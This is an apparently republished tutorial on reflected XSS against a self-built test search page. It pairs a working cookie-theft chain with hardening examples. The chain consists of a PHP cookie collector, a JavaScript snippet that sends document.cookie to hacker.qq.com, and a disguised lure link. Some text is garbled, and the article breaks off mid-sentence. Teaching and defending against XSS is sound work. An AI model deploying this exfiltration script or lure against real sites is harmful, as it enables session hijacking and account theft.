Practical demonstration of reflective xss

Source: Internet
Author: User

We know that XSS attacks are divided into three types: persistent (stored), non-persistent (reflected), and DOM-based. The reflected type is the most common and most widely used. The attacker sends someone a URL whose parameters carry malicious script code; when the URL is opened, the malicious parameter is rendered into the HTML and executed by the browser. It is non-persistent: the victim must click a link that carries the specific parameter.

Today we will give a practical demonstration of a reflected XSS attack to learn more about this attack method.

Preparations:

(1) login), a login CGI (login.php), and a search CGI (search.php). The interface is as follows:

Because XSS vulnerabilities generally occur where the site interacts with users, the search box is our focus.

(2) our own hacker website (another virtual site, hacker.qq.com). Under that domain there is a hack.php that collects users' cookies, and a hacker.js that sends requests to hack.php.


Vulnerability discovered

First, we need to find out where the XSS vulnerability on the site occurs. As mentioned above, the interaction with users is our main focus. Now we enter an arbitrary keyword, "computer", and click "Search":

The search results page looks like this (a simple search page I wrote myself):

We find that the characters we entered appear on the results page (many e-commerce sites use this kind of page). Okay, now we enter some special characters, "<script>alert(1)</script>", and click "Search":

A small pop-up window appears. It seems that search.php does not process the keywords entered by the user and outputs them to the page directly. Since the XSS vulnerability exists, we can start the attack; this attack aims to steal users' cookies.
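The root cause just observed is that search.php writes the keyword into the HTML unchanged. The following is an added example, not the page's own search.php: it places that unsafe echo beside an encoded version so the difference can be seen on the article's own probe string. The function names and the sample inputs are constructed for this illustration.

```php
<?php
// Added example (not the original page's search.php): the unsafe echo that the
// demonstration relies on, beside the encoded version that neutralises it.
// Function names and sample inputs are assumptions, not from the page.

// What the vulnerable search.php effectively does: the keyword is inserted
// into the HTML as-is, so "<script>" in q becomes a real script element.
function renderSearchVulnerable(string $q): string
{
    return "<p>Search results for: " . $q . "</p>";
}

// Hardened version: HTML-encode the keyword for its output context.
// ENT_QUOTES encodes both quote styles (needed if the value lands in an
// attribute); ENT_SUBSTITUTE avoids returning an empty string on bad UTF-8;
// the explicit charset stops multi-byte encoding tricks.
function renderSearchSafe(string $q): string
{
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<p>Search results for: " . $safe . "</p>";
}

// Constructed sample inputs: a normal keyword and the probe used in the article.
$samples = [
    'computer',
    '<script>alert(1)</script>',
];

foreach ($samples as $q) {
    echo "input:      " . $q . "\n";
    echo "vulnerable: " . renderSearchVulnerable($q) . "\n";
    echo "safe:       " . renderSearchSafe($q) . "\n\n";
}

// Simple self-check a reviewer might run: the encoded output must contain
// no raw <script> tag, so the browser shows it as text and never executes it.
$probe = '<script>alert(1)</script>';
if (strpos(renderSearchSafe($probe), '<script>') === false) {
    echo "check: encoded output contains no raw script tag\n";
} else {
    echo "check: FAILED, raw script tag survived encoding\n";
}
```

Run it with the PHP CLI to see both renderings side by side. Encoding must be applied at the point of output and chosen for the context (HTML body here; attribute, JavaScript and URL contexts each need their own encoding), which is why the fix belongs in the template rather than in an input filter.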

Attack

First, let's write our own cookie-collecting CGI (hack.php). The code is as follows:

    <?php
    // Cookie value arrives in the q parameter of the request made by hacker.js
    $cookie = $_GET['q'];
    var_dump($cookie);
    // Append nothing, just overwrite cookie.txt with the received value
    $myFile = "cookie.txt";
    file_put_contents($myFile, $cookie);
    ?>

Then write hacker.js, which sends the request. The code is as follows:

    var img = new Image();
    // Put the victim's cookies into the query string of a request to hack.php
    img.src = "http://hacker.qq.com/hack.php?q=" + document.cookie;
    document.body.append(img);

Okay. Now we can construct a link to fool the user:

    <a href="http://xsstest.qq.com/search.php?q=%3Cscript+src%3Dhttp%3A%2F%2Fhacker.qq.com%2Fhacker.js%3E%3C%2Fscript%3E&commend=all&ssid=s5-e&search_type=item&atype=&filterFineness=&rr=1&pcat=food2011&style=grid&cat=">click to send 998</a>


Look at the q parameter after search.php: after decoding it is <script src="http://hacker.qq.com/hacker.js"></script>. Its effect is to simulate the user entering <script src="http://hacker.qq.com/hacker.js"></script> in the search box and clicking Search. search.php inserts it into the page without processing, so it acquires new semantics in the HTML document: it loads hacker.js from the hacker.qq.com domain.

Open the cookie.txt file on the hacker host:


It is found that all accounts and passwords used for login are included, and the passwords are encrypted. OK, now we can use this cookie to obtain the user's login status.

The entire attack process ends.
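The cookie file above held the session material because the site set its cookie without HttpOnly, and the browser was free to load a script from hacker.qq.com. As an added example (not code from the page, and not the site's actual search.php), here is a hardened search.php that combines the three server-side controls a defender would apply: cookie flags that keep the session out of document.cookie, a Content Security Policy that refuses scripts from other origins, and output encoding as the primary fix. The session name 'app_session' is an assumption.

```php
<?php
// Added example (not from the original page): a hardened search.php that limits
// the damage of the cookie-theft step shown above. Header names and values are
// standard; the session name 'app_session' is an assumption.

// 1. Session cookie flags. HttpOnly keeps the cookie out of document.cookie,
//    so a script like hacker.js reads an empty string for it even if it runs;
//    Secure keeps it off plain HTTP; SameSite=Lax blocks most cross-site sends.
session_name('app_session');
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// 2. Content Security Policy: scripts may only come from this origin, so a
//    reflected <script src="http://hacker.qq.com/hacker.js"> is refused by the
//    browser, and an inline <script>alert(1)</script> is refused as well.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");

// 3. Output encoding remains the primary fix; the headers above are defence in depth.
//    The same encoded value is safe both inside the attribute and in the body text
//    because ENT_QUOTES encodes the quote characters.
$q = $_GET['q'] ?? '';
$safeQ = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
?>
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>Search</title></head>
<body>
<form method="get" action="search.php">
  <input type="text" name="q" value="<?= $safeQ ?>">
  <button type="submit">Search</button>
</form>
<p>Search results for: <?= $safeQ ?></p>
</body>
</html>
```

With these settings in place the link from the article still reaches search.php, but the reflected tag is rendered as text, the browser would refuse the external script even if the tag survived, and the session cookie would not be readable from JavaScript even if the script ran. Requests to a /search.php?q= containing an encoded "<script" are also a cheap thing to alert on in the web server access log.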


Of course, in practice few websites have such obvious XSS vulnerabilities. Here we have only demonstrated the principle of reflected XSS. Although there are many vulnerabilities in reality, they are essentially the same. You can further study
